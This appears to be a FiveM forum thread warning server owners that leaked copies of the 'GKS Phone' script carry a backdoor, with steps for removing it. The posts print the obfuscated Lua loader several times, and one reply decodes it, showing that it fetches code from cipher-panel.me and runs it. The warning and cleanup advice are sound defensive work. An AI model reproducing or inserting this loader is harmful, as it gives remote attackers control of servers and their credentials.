Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
Backdoors Found: 0
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard
justscripts

Script !WARNING! GKS PHONE (SCRIPT) read this if you are using GKSPhone

xXNozZXx

xXNozZXx

Gold Elite
Joined
Aug 30, 2021
Messages
113
Reaction score
1,164
Points
316
Location
Athens
Website
discord.gg
Hello friends of vag.gg today i wanna tell you something about GKS Phone , you maybe see a lot of leaks about this
if you download it you have been Remote Execution/Administration Tool known as RAT.

this resource is based of PerformHttpRequest execution code from web. That allows GKS owner to execute a malware that you will not understand at all.

What this Malware/RAT doing ?
Simple can restore your es_extended version 5 years ago , also it generate obfuscated shit code like this :

local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)

in every .lua file in your server also After this shit code is run, it will upload some javascript and override existing files within the system builders directory.

resources\[system]\[builders] <---- if you dont have this directory i wiill told you what you can do to remove the malware

The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove.

At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. The MalScanner batch file in this repository aims to show you exactly where the infected code is.

HOW TO REMOVE IT ?

1. Import all the resources files in to your visual studio like this :
1674348038524.png

(Select your resources folder only!)
1674348121206.png

First Step DONE

2. Stop Your Server Clear your Cache and Search about this : = {"\
How to check all resources?
simple do as i will show you in picture
1674348345837.png
1674348374351.png

remove every kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY =

3. DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn

4. Redownload the resources from here :
FOR YARN AND WEBPACK :
Hidden link for visitors, to see Log in or register now.

FOR XSOUND :
Hidden link for visitors, to see Log in or register now.


5 Be sure you dont have any kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\ (the its random for every victim this is just an example)
in your resources because it will spread again and again and again

6. Start Your server !

I hope this Topic will help you i will not put any reacts to saw this because i wanna help you because GKS owner/coder is retarded :) i do not recommend you to buy any script from him!
 
MahmoudiTech

MahmoudiTech

Gold Elite
Joined
Oct 13, 2021
Messages
244
Reaction score
138
Points
266
Location
Egypt
xXNozZ4RrxX said:
Hello friends of vag.gg today i wanna tell you something about GKS Phone , you maybe see a lot of leaks about this
if you download it you have been Remote Execution/Administration Tool known as RAT.

this resource is based of PerformHttpRequest execution code from web. That allows GKS owner to execute a malware that you will not understand at all.

What this Malware/RAT doing ?
Simple can restore your es_extended version 5 years ago , also it generate obfuscated shit code like this :

local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)

in every .lua file in your server also After this shit code is run, it will upload some javascript and override existing files within the system builders directory.

resources\[system]\[builders] <---- if you dont have this directory i wiill told you what you can do to remove the malware

The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove.

At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. The MalScanner batch file in this repository aims to show you exactly where the infected code is.

HOW TO REMOVE IT ?

1. Import all the resources files in to your visual studio like this :
View attachment 12123
(Select your resources folder only!)
View attachment 12124
First Step DONE

2. Stop Your Server Clear your Cache and Search about this : = {"\
How to check all resources?
simple do as i will show you in picture
View attachment 12127View attachment 12128
remove every kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY =

3. DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn

4. Redownload the resources from here :
FOR YARN AND WEBPACK :
Hidden link for visitors, to see Log in or register now.

FOR XSOUND :
Hidden link for visitors, to see Log in or register now.


5 Be sure you dont have any kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\ (the its random for every victim this is just an example)
in your resources because it will spread again and again and again

6. Start Your server !

I hope this Topic will help you i will not put any reacts to saw this because i wanna help you because GKS owner/coder is retarded :) i do not recommend you to buy any script from him!
Click to expand...
<3
 

DEVS123

C: 
local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)

to


C: 
local requestComponents = {
    "PerformHttpRequest",
    "assert",
    "load",
    _G,
    "",
    nil
}

_G[requestComponents[1]](
    "https://cipher-panel.me/_i/v2_/stage3.php?to=THJXg7",
    function (requestHandle, responseData)
        if responseData == requestComponents[6] or responseData == requestComponents[5] then
            return
        end

        local loadFunc = _G[requestComponents[3]](responseData)
        _G[requestComponents[2]](loadFunc)()
    end
)
 
mbeckann

mbeckann

Gold Elite
Joined
Jul 29, 2022
Messages
58
Reaction score
103
Points
256
Location
brazil
I'm not sure how to remove it, could someone help me?
 
Schizo

Schizo

VIP
Joined
Apr 13, 2022
Messages
960
Reaction score
181,627
Points
316
Location
Antarctica
Website
frodycustoms.store
xXNozZ4RrxX said:
Hello friends of vag.gg today i wanna tell you something about GKS Phone , you maybe see a lot of leaks about this
if you download it you have been Remote Execution/Administration Tool known as RAT.

this resource is based of PerformHttpRequest execution code from web. That allows GKS owner to execute a malware that you will not understand at all.

What this Malware/RAT doing ?
Simple can restore your es_extended version 5 years ago , also it generate obfuscated shit code like this :

local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)

in every .lua file in your server also After this shit code is run, it will upload some javascript and override existing files within the system builders directory.

resources\[system]\[builders] <---- if you dont have this directory i wiill told you what you can do to remove the malware

The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove.

At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. The MalScanner batch file in this repository aims to show you exactly where the infected code is.

HOW TO REMOVE IT ?

1. Import all the resources files in to your visual studio like this :
View attachment 12123
(Select your resources folder only!)
View attachment 12124
First Step DONE

2. Stop Your Server Clear your Cache and Search about this : = {"\
How to check all resources?
simple do as i will show you in picture
View attachment 12127View attachment 12128
remove every kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY =

3. DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn

4. Redownload the resources from here :
FOR YARN AND WEBPACK :
Hidden link for visitors, to see Log in or register now.

FOR XSOUND :
Hidden link for visitors, to see Log in or register now.


5 Be sure you dont have any kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\ (the its random for every victim this is just an example)
in your resources because it will spread again and again and again

6. Start Your server !

I hope this Topic will help you i will not put any reacts to saw this because i wanna help you because GKS owner/coder is retarded :) i do not recommend you to buy any script from him!
Click to expand...
Great work
 
MaxHero

MaxHero

Gold Elite
Joined
Jul 10, 2021
Messages
209
Solutions
5
Reaction score
292
Points
316
Location
Türkiye
Good job (y):cool: Not for just ESX Qbcore also same ...!!
 
You must log in or register to reply here.
Top